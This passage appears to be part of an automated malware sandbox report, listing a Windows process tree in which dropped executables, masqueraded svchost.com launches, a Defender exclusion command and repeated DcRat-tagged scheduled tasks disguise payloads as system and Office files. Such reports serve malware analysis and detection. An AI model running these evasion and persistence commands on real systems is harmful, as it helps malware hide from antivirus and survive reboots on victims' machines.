                                                                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\100108~2\FILE30~1.EXE -Force
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                              PID:6216
                                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                                                                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:1520
                                                                                                                                                                                                        • C:\Windows\svchost.com
                                                                                                                                                                                                          "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100110~1\jok.exe"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                          PID:6316
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\100110~1\jok.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\100110~1\jok.exe
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:5508
                                                                                                                                                                                                          • C:\Windows\svchost.com
                                                                                                                                                                                                            "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100110~2\swiiii.exe"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                            PID:7148
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\100110~2\swiiii.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\100110~2\swiiii.exe
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                              PID:6036
                                                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                PID:6644
                                                                                                                                                                                                          • C:\Windows\svchost.com
                                                                                                                                                                                                            "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100115~1\INSTAL~1.EXE"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                            PID:6220
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\100115~1\INSTAL~1.EXE
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\100115~1\INSTAL~1.EXE
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                              PID:6532
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\install.bat" "
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:3576
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                    Sc delete GameServerClient
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                                                    PID:3604
                                                                                                                                                                                                                  • C:\Program Files (x86)\GameServerClient\GameService.exe
                                                                                                                                                                                                                    GameService remove GameServerClient confirm
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                      PID:6576
                                                                                                                                                                                                                    • C:\Program Files (x86)\GameServerClient\GameService.exe
                                                                                                                                                                                                                      GameService install GameServerClient "C:\Program Files (x86)\GameServerClient\GameClient.exe"
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                        PID:1604
                                                                                                                                                                                                                      • C:\Program Files (x86)\GameServerClient\GameService.exe
                                                                                                                                                                                                                        GameService start GameServerClient
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                          PID:5620
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\installc.bat" "
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:4032
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                            Sc delete GameServerClientC
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                                                            PID:5168
                                                                                                                                                                                                                          • C:\Program Files (x86)\GameServerClient\GameService.exe
                                                                                                                                                                                                                            GameService remove GameServerClientC confirm
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                              PID:6844
                                                                                                                                                                                                                            • C:\Program Files (x86)\GameServerClient\GameService.exe
                                                                                                                                                                                                                              GameService install GameServerClientC "C:\Program Files (x86)\GameServerClient\GameClientC.exe"
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                PID:6624
                                                                                                                                                                                                                              • C:\Program Files (x86)\GameServerClient\GameService.exe
                                                                                                                                                                                                                                GameService start GameServerClientC
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                  PID:1960
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:4488
                                                                                                                                                                                                                            • C:\Windows\svchost.com
                                                                                                                                                                                                                              "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100115~2\lie1234.exe"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                              PID:6724
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\100115~2\lie1234.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\100115~2\lie1234.exe
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                PID:5908
                                                                                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:6012
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:1196
                                                                                                                                                                                                                              • C:\Windows\svchost.com
                                                                                                                                                                                                                                "C:\Windows\svchost.com" "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --profile-directory=Default
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                PID:5868
                                                                                                                                                                                                                                • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                                                                                  C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe --profile-directory=Default
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                  • Checks system information in the registry
                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                  • System policy modification
                                                                                                                                                                                                                                  PID:2624
                                                                                                                                                                                                                                  • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                                                                                    C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 --annotation=exe=C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xa0,0x10c,0x7ffc0cdd3cb8,0x7ffc0cdd3cc8,0x7ffc0cdd3cd8
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:2820
                                                                                                                                                                                                                                    • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                                                                                      "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,12182191812846748913,221940959218547786,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2000 /prefetch:2
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:4428
                                                                                                                                                                                                                                      • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                                                                                        "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1988,12182191812846748913,221940959218547786,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 /prefetch:3
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:2392
                                                                                                                                                                                                                                        • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                                                                                          "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1988,12182191812846748913,221940959218547786,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2636 /prefetch:8
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:1916
                                                                                                                                                                                                                                          • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                                                                                            "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,12182191812846748913,221940959218547786,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3028 /prefetch:1
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:4092
                                                                                                                                                                                                                                            • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                                                                                              "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,12182191812846748913,221940959218547786,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3048 /prefetch:1
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:3348
                                                                                                                                                                                                                                              • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,12182191812846748913,221940959218547786,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:1
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:1604
                                                                                                                                                                                                                                                • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                  "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,12182191812846748913,221940959218547786,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:1
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:2408
                                                                                                                                                                                                                                                  • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1988,12182191812846748913,221940959218547786,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3984 /prefetch:8
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:6264
                                                                                                                                                                                                                                                    • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,12182191812846748913,221940959218547786,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4896 /prefetch:1
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:6764
                                                                                                                                                                                                                                                      • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,12182191812846748913,221940959218547786,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:1
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:6780
                                                                                                                                                                                                                                                        • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                          "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,12182191812846748913,221940959218547786,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3728 /prefetch:1
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:3080
                                                                                                                                                                                                                                                          • C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\identity_helper.exe
                                                                                                                                                                                                                                                            "C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,12182191812846748913,221940959218547786,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3796 /prefetch:8
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                            PID:6416
                                                                                                                                                                                                                                                            • C:\Windows\svchost.com
                                                                                                                                                                                                                                                              "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\IDENTI~1.EXE" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,12182191812846748913,221940959218547786,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3796 /prefetch:8
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                              PID:5816
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3582-490\IDENTI~1.EXE
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\3582-490\IDENTI~1.EXE --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,12182191812846748913,221940959218547786,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3796 /prefetch:8
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                  PID:3348
                                                                                                                                                                                                                                                            • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                              "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,12182191812846748913,221940959218547786,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4212 /prefetch:1
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:2720
                                                                                                                                                                                                                                                              • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,12182191812846748913,221940959218547786,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2920 /prefetch:1
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:6200
                                                                                                                                                                                                                                                                • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,12182191812846748913,221940959218547786,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2308 /prefetch:1
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:4368
                                                                                                                                                                                                                                                                  • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                    "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,12182191812846748913,221940959218547786,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:2692
                                                                                                                                                                                                                                                                    • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                      "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,12182191812846748913,221940959218547786,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4844 /prefetch:1
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:2056
                                                                                                                                                                                                                                                                      • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,12182191812846748913,221940959218547786,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:1
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:6880
                                                                                                                                                                                                                                                                        • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,12182191812846748913,221940959218547786,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3016 /prefetch:1
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:5192
                                                                                                                                                                                                                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:2284
                                                                                                                                                                                                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:5604
                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\Windows\Fonts\OfficeClickToRun.exe'" /f
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                            PID:6564
                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Windows\Fonts\OfficeClickToRun.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                            PID:6588
                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 12 /tr "'C:\Windows\Fonts\OfficeClickToRun.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                            PID:6612
                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "MSI.CentralServerM" /sc MINUTE /mo 14 /tr "'C:\Program Files\WindowsPowerShell\MSI.CentralServer.exe'" /f
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                            PID:6648
                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "MSI.CentralServer" /sc ONLOGON /tr "'C:\Program Files\WindowsPowerShell\MSI.CentralServer.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                            PID:6724
                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "MSI.CentralServerM" /sc MINUTE /mo 10 /tr "'C:\Program Files\WindowsPowerShell\MSI.CentralServer.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                            PID:6828
                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Windows\Registration\CRMLog\wininit.exe'" /f
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                            PID:6960
                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\Registration\CRMLog\wininit.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                            PID:7060
                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 8 /tr "'C:\Windows\Registration\CRMLog\wininit.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                            PID:7100
                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "botb" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\bot.exe'" /f
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                            PID:7160
                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "bot" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\bot.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                            PID:6152
                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "botb" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\bot.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                            PID:268
                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "dais123d" /sc MINUTE /mo 11 /tr "'C:\Program Files\Microsoft Office\dais123.exe'" /f
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                            PID:4348
                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "dais123" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\dais123.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                            PID:3080
                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "dais123d" /sc MINUTE /mo 6 /tr "'C:\Program Files\Microsoft Office\dais123.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                            PID:5224
                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "winhostDhcpw" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe'" /f
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                            PID:6208
                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "winhostDhcp" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                            1⤵
